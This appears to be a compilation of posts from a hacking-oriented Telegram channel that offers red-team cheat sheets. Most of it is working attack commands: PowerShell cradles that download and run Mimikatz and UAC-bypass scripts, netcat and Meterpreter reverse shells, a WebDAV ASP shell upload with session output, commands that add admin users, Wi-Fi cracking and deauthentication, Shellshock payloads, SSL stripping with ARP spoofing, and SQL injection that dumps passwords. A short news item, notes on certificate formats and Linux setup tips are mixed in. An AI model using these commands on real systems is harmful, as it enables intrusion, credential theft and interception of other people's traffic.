Support & Share :

T.me/UndercodeTesting

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”

# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"

# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)

# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe

# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1


ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PORT FORWARDING "port to port":
-Your own :

----MSF----
Most platforms

Forward:
Get meterpreter session on one of the dual homed machines
portfwd add -l 4445 -p 4443 -r 10.1.1.1
Use -R to make it reverse


----SSH----
For Linux

~C "if you already have an SSH session"

-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<------------<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn't have direct access to


-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<------------<REMOTE 10.1.1.230>:8083<------------<REMOTE X.X.X.X>:XXXX
run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it


For reverse shell:
msfvenom -p linux/x86/shellreversetcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali


Or if you didn't have an SSH session, then SSH to your Kali from target machine:
On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd"
ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1


---PLINK----
Just like SSH, on Windows
service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS

---SOCAT----
For linux

Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443


---CHISEL----
Most platforms
Remote static tunnels "port to port":

On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse

General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:YOUR LOCAL IP:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>


Remote tunnels "access IP:PORT you couldn't access before":
On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80


Local tunnels "listen on the target for something, and send it to us":
On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
----------------------------------------------------------------------------------------

DYNAMIC "port to any":
setup proxychains with socks5 on 127.0.0.1:1080
Or set up socks5 proxy on firefox
For nmap use -Pn -sT or use tcp scanner in msf

----MSF----
Most platforms

Get meterpreter session on one of the dual homed machines
Auto route to 10.1.1.0 (multi/manage/autoroute)
Start socks proxy (auxiliary/server/socks4a)

(portscan once created route)
use auxilliary/scanner/portscan/tcp
set RHOSTS IP (pivoting onto thats not part of arpscan you ran)
(if a machine has port 80 and webports, to check it through out machine we have to create a portworward)
portfwd add -l 8001 -p 80 -r IP
(then go to 127.0.0.1:8001)

----SSH----
For Linux
-D1080

---PLINK---
Just like SSH, on Windows
On Target: plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS

---CHISEL----
Most platforms

On Kali:
./chisel server -p 8000 -reverse

On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5

On Kali:
./chisel client 127.0.0.1:8001 socks


ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WPA2 PSK attack with aircrack-ng suite.
#TipsForBeginers

ifconfig wlan1 # check wireless IFace
sudo airmon-ng check kill # kill issue causing processes
sudo airmon-ng start wlan1 # start monitor mode
sudo airodump-ng wlan1mon # start capturing
sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output
sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client
sudo aircrack-ng output-01.cap dict # crack the passphrase


WPA PSK attack with aircrack-ng suite.
--------------------------------------

Place your wireless card into Monitor Mode
airmon-ng start wlan0

Detect all available wireless AP’s and clients
airodump-ng mon0

Setting adapter channel
iwconfig mon0 channel <channelnumber>

Capturing the four-way handshake
airodump-ng --channel <channelnumber> --bssid <bssid> --write capture mon0

You can capture the handshake passively (it takes time) or de-authenticate a client.

De-authentication attack
aireplay-ng --deauth 3 -a <BSSID> -c <clientmac> mon0

Deauth every client - aireplay-ng -0 5 -a <bssid> mon0

Dictionary Attack
aircrack-ng -w passwords.lst capture-01.cap

Brute force Attack
crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap


WEP attack with aircrack-ng suite.
----------------------------------

Place your wireless card into Monitor Mode
airmon-ng start wlan0

Detect all available wireless AP’s and clients
airodump-ng mon0

Setting adapter channel
iwconfig mon0 channel <channelnumber>

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

aircrack-ng -b (bssid) (file name-01.cap)


Rogue Access Point Testing
--------------------------

# ifconfig wlan0 down
# iw reg set BO
# iwconfig wlan0 txpower 0
# ifconfig wlan0 up
# airmon-ng start wlan0
# airodump-ng --write capture mon0

root@backbox:/home/backbox# ifconfig wlan1 down
root@backbox:/home/backbox# iw reg set BO
root@backbox:/home/backbox# ifconfig wlan1 up
root@backbox:/home/backbox# iwconfig wlan1 channel 13
root@backbox:/home/backbox# iwconfig wlan1 txpower 30
root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto


Reaver
------

airmon-ng start wlan0
airodump-ng wlan0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1


Pixie WPS
---------

airmon-ng check
airmon-ng start wlan0
airodump-ng wlan0mon --wps
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1


Wireless Notes
--------------

Wired Equivalent Privacy (WEP)
RC4 stream cipher w/ CRC32 for integrity check
- Attack:
By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs.
- Remediation:
Use WPA2

Wifi Protected Access (WPA)
Temporal Key Integrity Protocol (TKIP) Message Integrity Check
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
Use long-keys

Wifi Protected Access 2 (WPA2)
Advanced Encryption Standard (AES)
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
WPA-Enterprise


ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WIRELESS ANTENNA ALL YOU NEED IS HIT UP THOSE COMMANDS ON YOUR TEMINAL :)
- #Wifihacking


Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
Increase Wi-Fi TX Power
root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig
Change WiFi Channel
root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>


WEP CRACKING


Method 1 : Fake Authentication Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 2 : ARP Replay Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 3 : Chop Chop Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aireplay-ng -4 –b <BSSID> -h <OurMac> wlan0mon
#Press ‘y’ ;
root@uceka:~# packetforge-ng -0 –a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@uceka:~# aireplay-ng -2 –r <FileName2> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>

Method 4 : Fragmentation Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aireplay-ng -5 –b<BSSID> -h < OurMac > wlan0mon
#Press ‘y’ ;
root@uceka:~# packetforge-ng -0 –a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@uceka:~# aireplay-ng -2 –r <FileName2> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>

Method 5 : SKA (Shared Key Authentication) Type Cracking
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@uceka:~# aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# macchanger –-mac <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon up
root@uceka:~# aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
root@uceka:~# aireplay-ng –-deauth 1 –a <BSSID> -h <FakedMac> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>

ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

reverse engineering tutorial

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME Windows TRICKS :

Windows Privilege Escalation resource
http://www.fuzzysecurity.com/tutorials/16.html


Try the getsystem command using meterpreter - rarely works but is worth a try.
meterpreter > getsystem


Metasploit Meterpreter Privilege Escalation Guide
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/


Windows Server 2003 and IIS 6.0 WEBDAV Exploiting
http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html

msfvenom -p windows/meterpreter/reversetcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt

cadavar http://$ip
dav:/> put aspshell.txt
Uploading aspshell.txt to `/aspshell.txt':
Progress: [=============================>] 100.0% of 38468 bytes succeeded.
dav:/> copy aspshell.txt aspshell3.asp;.txt
Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.
dav:/> exit

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reversetcp
msf exploit(handler) > set LHOST 1.2.3.4
msf exploit(handler) > set LPORT 80
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j

curl http://$ip/aspshell3.asp;.txt

* Started reverse TCP handler on 1.2.3.4:443
* Starting the payload handler...
* Sending stage (957487 bytes) to 1.2.3.5
* Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700


Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.

pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py


Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
https://www.exploit-db.com/exploits/6705/
https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco
churrasco
/churrasco/-->Usage: Churrasco.exe -d "command to run"

c:\Inetpub>churrasco -d "net user /add <username> <password>"
c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"


Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
python pyinstaller.py --onefile ms11-080.py
mx11-080.exe -O XP


Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:

MS16-032 https://www.exploit-db.com/exploits/39719/
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"


Powershell Priv Escalation Tools
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc


Windows Run As - Switching users in linux is trival with the SU command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.


Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).

C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:

C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...

ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Top Windows 10 Public Cve & Bugs :


CVE-2015-1769 MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege

CVE-2015-2426 ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the atmfd.dll driver

CVE-2015-2479 MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege

CVE-2015-2513 MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code Execution

CVE-2015-2423 MS15-088 - Unsafe Command Line Parameter
Passing - Could Allow Information Disclosure

CVE-2015-2431 MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow Remote Code Execution

CVE-2015-2441 MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects in memory - allows remote code execution

CVE-2015-0057 exploits GUI component of Windows namely the scrollbar element - allows complete control of a Windows machine



▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Verify Various Vulnerabilities


+ IPMI Cipher Suite Zero Authentication Bypass:
http://www.tenable.com/plugins/index.php?view=single&id=68931

Tools required:
ipmitool
freeipmi-tools

ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list

# Specifying Cipher Suite Zero
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis status
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor


+ Bash Remote Code Execution (Shellshock)
http://www.tenable.com/plugins/index.php?view=single&id=77823

x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt
x: () { :;}; echo "Hacked" > /var/www/hacked.html


+ DNS Server Cache Snooping Remote Information Disclosure
http://www.tenable.com/plugins/index.php?view=single&id=12217

Nmap Script: dns-cache-snoop
http://nmap.org/nsedoc/scripts/dns-cache-snoop.html

nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' <target>


+ IP Forwarding Enabled
http://www.tenable.com/plugins/index.php?view=single&id=50686

Nmap Script: ip-forwarding
http://nmap.org/nsedoc/scripts/ip-forwarding.html

sudo nmap -sn <target> --script ip-forwarding --script-args='target=www.example.com'

Alternatives:
- Set VM's default gateway as the victim IP address and attempt to route elsewhere.
- http://pentestmonkey.net/tools/gateway-finder


ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Configure an Ethernet interface as a VLAN trunk

Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3.

+ First install the vlan package if it is not already present:

apt-get install vlan

+ Turn off network-manager

sudo stop network-manager

+ Configuring interfaces

vconfig add eth0 <VLAN ID> (you may get a warning message on the first one)
example: vconfig add eth0 101

ifconfig eth0.<VLAN ID> <IP Address>/24 up
example: ifconfig eth0.101 192.168.1.10/24 up

ifconfig eth0.<VLAN ID>

Note: If any issues run, ifconfig eth0 0.0.0.0 up
Note: Specify interface with nmap scanning (nmap -e eth0.101)
Note: You will probably need to add individual routes for each vlan if you want to communicate between vlans, don't rely on your default gateway. (route add)

+ Remove Configuration
vconfig rem eth0.101

ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SSL Strip
Kali-Ubuntu-parrot pre installed tool
#FastTips

1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

3) sslstip.py -l 8080 -f lock.ico

4) Run arpspoof to redirect traffic to your machine (as root):
arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>

ENJOY❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑[+] Union Based SQL Injection

' or 1=1#

1' ORDER BY 10#

1' UNION SELECT version(),2#

1' UNION SELECT version(),database()#

1' UNION SELECT version(),user()#

1' UNION ALL SELECT table_name,2 from information_schema.tables#

1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#

1' UNION ALL SELECT concat(user,char(58),password),2 from users#


sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑India plans to set up a regulatory agency to limit the data dominance of giants such as Google Facebook
#News

> Netease Technology News, July 13th, according to foreign media reports, an expert committee appointed by the Indian government recommended that India need to establish a new data regulator to monitor the collection of online information sharing, monetization and privacy issues, in order to restrict Google , Facebook, Amazon, Uber and other US technology giants dominate online data.

>The committee of eight experts submitted a report saying that market forces alone will not bring the greatest benefit to society from the data, and the new regulatory agency must address the resulting key issues. The report recommends that this agency must ensure that all stakeholders comply with the rules, provide data when making legal requests, assess the risks of re-identifying anonymous personal data, and help create a level playing field for businesses.

> The document said that American technology giants such as Facebook, Amazon, Uber, and Google have a first-mover advantage and are the beneficiaries of the network effect, causing many new entrants and startups to be squeezed and facing huge barriers to entry. The envisioned role of regulators in facilitating data sharing will be to mitigate these effects and stimulate innovation, economic growth and social well-being.

> As countries around the world strengthen domestic data protection, India is drafting and strengthening policies to manage its booming digital economy. India has enacted a law governing the use of personal data, and the latest report also recommends legislation to increase the supervision of non-personal data. Non-personal data refers to information that does not include names, ages, or addresses that can be used to identify individuals. It also includes information that was originally private, but was later aggregated into anonymous data.

>The rules proposed in the report will govern data collection, analysis, sharing, and destruction. According to the report, the purpose of this move is to provide insight to existing companies and encourage the creation of new businesses, thereby exploring the “huge” social and public value of data.

> The committee recommends creating new "data business" classifications for companies that collect, process, store, or otherwise manage data. These companies include health, e-commerce, Internet and technical services companies, and the committee consulted them before drafting the report. The data business is envisaged to cover various industry sectors.

#News
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Key and Certificate Formats

1️⃣Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:

2️⃣Binary (DER) certificate

Contains an X.509 certificate in raw form using DER ASN.1 encoding.

3️⃣ASCII (PEM) certificate (s)

Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require the server certificate to be one in one file, and all intermediate certificates in another.

4️⃣Binary (DER) key

Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .

5️⃣ASCII (PEM) key

Contains a DER64 key in base64 encoding , sometimes with additional metadata (for example, the algorithm used for password protection).

6️⃣PKCS # 7 Certificate

A complex format for transporting signed or encrypted data defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.

7️⃣PKCS # 12 (PFX) key and certificate (s)

A complex format that can store and protect a server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.


enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Firewall Bypass for Cloudflare, Incapsula, SUCURI Web Applications : Possible ?

Web application firewalls (Web Application Firewall - WAF) are web server add-ons (modules) (such as mod_security for Apache), or services (such as Cloudflare, Incapsula, SUCURI) that before transmitting a web request from a user -server, analyze it and, if it can be dangerous, block it or modify it.

Application firewalls can additionally perform intrusion detection and prevention functions.

If WAF is a web server module, then this software runs on the same server (computer). If WAF is a separate service, then the scheme of work is as follows:

1) The website to be protected runs on the same server without protection.

2) In the DNS record A, the IP addresses of the web application firewall, that is, Cloudflare, Incapsula, SUCURI or some other, are indicated as the IP of this site

3). After that, when accessing the protected website, all requests are already sent to the Cloudflare, Incapsula, SUCURI or equivalent service

4) This service receives a request, processes it and makes a request to the source server (which, I recall, is not even protected), receives from it the desired page / data and redirects to the requesting user.

🦑For a normal visitor connecting to a website, there is no difference; everything happens unnoticed. But for website audit purposes, file firewalls can become problems. WAF blocks malicious requests and protects against (D) DoS attacks. At the same time, no requests from scripts (bots) can be accepted at all - they are filtered out at the initial stage, or at the stage of passing captcha, which makes it impossible to use tools such as WPScan , sqlmap and other programs to search for vulnerabilities and assess the security of the website. If in the case of WAFs built into the server (for example, mod_security), only one bypass option is possible - the design of such requests that deceive the rules based on patterns (patterns), then for WAF services there are two possible options:

1) The same as for regular WAFs - that is, an attempt to outsmart the rules;

2) Sending requests directly to the server, bypassing WAF.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Installing Bypass firewalls by abusing DNS history in Kali Linux:

1️⃣sudo apt install jq<font></font>

2️⃣git clone https://github.com/vincentcox/bypass-firewalls-by-DNS-history<font></font>

3️⃣cd bypass-firewalls-by-DNS-history/<font></font>

4️⃣bash bypass-firewalls-by-DNS-history.sh --help


enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Random linux tips :

> for Configure two tomcat project deployments on a virtual machine

> Turn off the firewall and selinux

1️⃣[root@keiv~]# systemctl stop firewalld

2️⃣[root@keiv ~]# systemctl disable firewalld

3️⃣Removed symlink /etc/systemd/system/multi-user.target.wants/firewalld.service.

4️⃣Removed symlink /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service.

5️⃣[root@keiv ~]# setenforce 0

6️⃣[root@keiv ~]# sed -ri 's/^(SELINUX=).*/\1disabled/g' /etc/selinux/config


🦑Install jdk environment

1️⃣[root@keiv ~]# yum -y install java-1.8.0-openjdk java-1.8.0-openjdk-devel

